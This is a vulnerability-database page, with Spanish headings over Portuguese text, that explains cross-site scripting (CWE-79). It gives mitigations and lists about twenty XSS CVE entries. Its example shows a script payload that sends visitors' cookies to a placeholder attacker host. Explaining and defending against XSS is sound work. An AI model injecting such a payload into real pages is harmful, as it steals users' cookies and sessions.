Fallos del tipo CWE-79

28.947 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2023-1746LOWDreamer CMS File Upload cross site scriptingEPSS 0.6%CVE-2022-40193MEDIUMWordPress Awesome Filterable Portfolio plugin <= 1.9.7 - Unauthenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2021-24880—SupportCandy < 2.2.7 - Contributor+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-24738—Logo Carousel < 3.4.2 - Contributor+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2023-1852LOWSourceCodester Online Payroll System deduction_edit.php cross site scriptingEPSS 0.6%CVE-2023-1798LOWEyouCMS login.php cross site scriptingEPSS 0.6%CVE-2021-27912HIGHXSS vulnerability on asset viewEPSS 0.6%CVE-2021-24680—WP Travel Engine < 5.3.1 - Editor+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-25113—Dropdown Menu Widget <= 1.9.7 - Subscriber+ Arbitrary Settings Update to Stored XSSEPSS 0.6%CVE-2021-24828—Mortgage Calculator / Loan Calculator < 1.5.17 - Contributor+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-24826—Custom Content Shortcode < 4.0.2 - Authenticated Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-24897—Add Subtitle <= 1.1.0 - Contributor+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2023-6463LOWSourceCodester User Registration and Login System add-user.php cross site scriptingEPSS 0.6%CVE-2021-42360HIGHStarter Templates — Elementor, Gutenberg & Beaver Builder Templates <= 2.7.0 Authenticated Block Import to Stored XSSEPSS 0.6%CVE-2023-1359LOWSourceCodester Gadget Works Online Ordering System Add New User cross site scriptingEPSS 0.6%CVE-2023-3838LOWDedeBIZ vote_edit.php cross site scriptingEPSS 0.6%CVE-2023-4847LOWSourceCodester Simple Book Catalog App Update Book Form cross site scriptingEPSS 0.6%CVE-2014-3650—Multiple persistent cross-site scripting (XSS) flaws were found in the way Aerogear handled certain user-supplied content. A remote attackerEPSS 0.6%CVE-2023-2120MEDIUMThumbnail carousel slider <= 1.1.9 - Reflected Cross-Site ScriptingEPSS 0.6%CVE-2024-28199HIGHCross-site Scripting (XSS) possible with maliciously formed HTML attribute names and values in PhlexEPSS 0.6%